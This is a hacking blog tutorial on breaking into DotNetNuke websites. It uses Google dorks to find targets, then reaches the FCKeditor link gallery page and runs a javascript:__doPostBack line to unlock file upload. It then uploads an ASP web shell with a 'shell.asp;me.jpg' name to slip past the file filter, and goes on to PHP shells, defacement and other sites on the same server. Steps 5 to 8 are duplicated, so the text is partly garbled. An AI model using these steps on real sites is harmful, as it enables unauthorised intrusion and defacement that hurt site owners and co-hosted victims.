Assalam O Alikum Guyz :) Tutorial By p4k_sNip3r (FOCSoft.clogspot.com)
What is DNN (Dot Net Nuke) ?
DotNetNuke
is an open source platform for building web sites based on Microsoft
.NET technology. DotNetNuke is mainly provide Content Management
System(CMS) for the personal websites.
In this tutorial, i am showing how to hack website with DNN Exploit
Step 1:
Go to Google
Step 2:
Now put any dork on search box and click Search.
- inurl:fcklinkgallery.aspx
- inurl:/portals/0
- inurl:/tabid/36/language/en-US/Default.aspx
Step 3:
It will show a list of many sites, select the site which you want to hack.
For example let's take this;
http://www.vulsite.com/home/tabid/36/language/en-US/Default.aspx
Step 4:
Now replace;
home/tabid/36/language/en-US/Default.aspx
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
so your url will become;
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Now there are 2 possibilities
If you get Link Gallery URL select then site is not vulnerable, see the image below;;
so your url will become;
http://www.vulsite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Now there are 2 possibilities
If you get Link Gallery URL select then site is not vulnerable, see the image below;;
Step 5:
Now you can see 3 options there and we need to select “File”.
Step 6: Now after selecting option, we need to use a javascript code. For that we need to use that browser which supports javascript. Before using javascript first we need to choose file location as root, after that clear everything written on browser URL, paste the below javascript only.
javascript:__doPostBack('ctlURL$cmdUpload','')
After injecting the above javascript code in browser address bar,you will get upload option instead of selection option;
Step 7: Now you have to upload your shell, so first upload this shell shell.asp;me.jpg ( Download the shell from the Download button given at the end of article)
After uploading you can access your ASP shell by going to this address,
http://www.vulsite.com/portals/0/yourshell.asp;me.jpg
After opening this address you will get this and upload your any php shell i.e.JackelShell.php or c99.php
Step 8:After uploading your php shell navigate to;
http://www.vulsite.com/portals/0/yourshell.asp;me.jpg
Now upload your Deface page in the root of the site. You can also hack all sites which are hosted on same server.
Now you can see 3 options there and we need to select “File”.
Step 6: Now after selecting option, we need to use a javascript code. For that we need to use that browser which supports javascript. Before using javascript first we need to choose file location as root, after that clear everything written on browser URL, paste the below javascript only.
javascript:__doPostBack('ctlURL$cmdUpload','')
After injecting the above javascript code in browser address bar,you will get upload option instead of selection option;
Step 7: Now you have to upload your shell, so first upload this shell shell.asp;me.jpg ( Download the shell from the Download button given at the end of article)
After uploading you can access your ASP shell by going to this address,
http://www.vulsite.com/portals/0/yourshell.asp;me.jpg
After opening this address you will get this and upload your any php shell i.e.JackelShell.php or c99.php
Step 8:After uploading your php shell navigate to;
http://www.vulsite.com/portals/0/yourshell.asp;me.jpg
Now upload your Deface page in the root of the site. You can also hack all sites which are hosted on same server.
Note: Do Not Use Any Tutorial Of This Blog To Harm Anyone.This Is Only For Educational Purpose.
Regards :> p4k_sNip3r
Muhammad Shahbaz (17 Years Old) is a Young blogger, SEO Expert, & Cyber Security Expert from Pakistan 
0 Comments:
Post a Comment
If you're having issues, Please leave an email address I can contact you on -
I advise you to also "subscribe to the comment feed" and get email updates when I respond to your question.
Hyperlinks are not allowed, Spam/advertising comments will NEVER BE TOLERATED and will be deleted immediately!
Thanks for reading,
Administrator Of FOCSoft